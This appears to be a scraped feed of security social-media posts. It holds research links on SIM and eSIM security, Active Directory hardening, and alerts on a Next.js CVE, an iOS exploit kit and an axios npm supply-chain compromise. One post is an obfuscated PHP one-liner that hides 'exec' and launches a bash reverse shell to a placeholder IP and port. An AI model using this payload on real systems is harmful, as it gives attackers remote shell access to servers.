thank you offensive security 😅

Using silent SMS to localize LTE users mandomat.github.io/2023-09-21-loc…

Best Practices for Securing Active Directory learn.microsoft.com/en-us/windows-…

</2023>

get_defined_functions()['internal'][array_search(urldecode("%65%78%65%63"), get_defined_functions()['internal'])]("/bin/bash -c 'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'");

application security for developers. docs.stackhawk.com/vulnerabilitie… #appsec

Awesome-Red-Team-Operation github.com/CyberSecurityU…

SIMurai is software that emulates a SIM card, which helps in fuzzing modem firmware for vulnerabilities or testing SIM spyware. 🚗📡🔨 Connected cars included :) Research Paper: usenix.org/system/files/u… Presentation: usenix.org/system/files/u… Source code: github.com/tomasz-lisowsk…

wake up neo

</2024>

eSIM and its security and privacy issues: Embedded Subscriber Identity Module in a nutshell ☎️ 🐾🔎🌍🎯 More details on: LinkedIn: linkedin.com/posts/dlaskov_… Substack: it4sec.substack.com/p/esim-and-its…

this outage got hands

Update on CVE-2025-66478 (React2Shell): An npm package has been released to scan and update affected Next.js apps. Use `npx fix-react2shell-next` to update to patched versions. All users should update as soon as possible. More details our blog: nextjs.org/cve-2025-66478

🚨 WARNING - A new #iOS exploit kit, DarkSword, has been active since late 2025 across multiple threat groups. It targets #iPhone on iOS 18.4–18.7, chaining zero-days to gain full access and rapidly extract data—files, messages, credentials, and crypto wallets—then wipe traces

🚨 CRITICAL: Active supply chain attack on axios -- one of npm's most depended-on packages. The latest [email protected] now pulls in [email protected], a package that did not exist before today. This is a live compromise. This is textbook supply chain installer malware. axios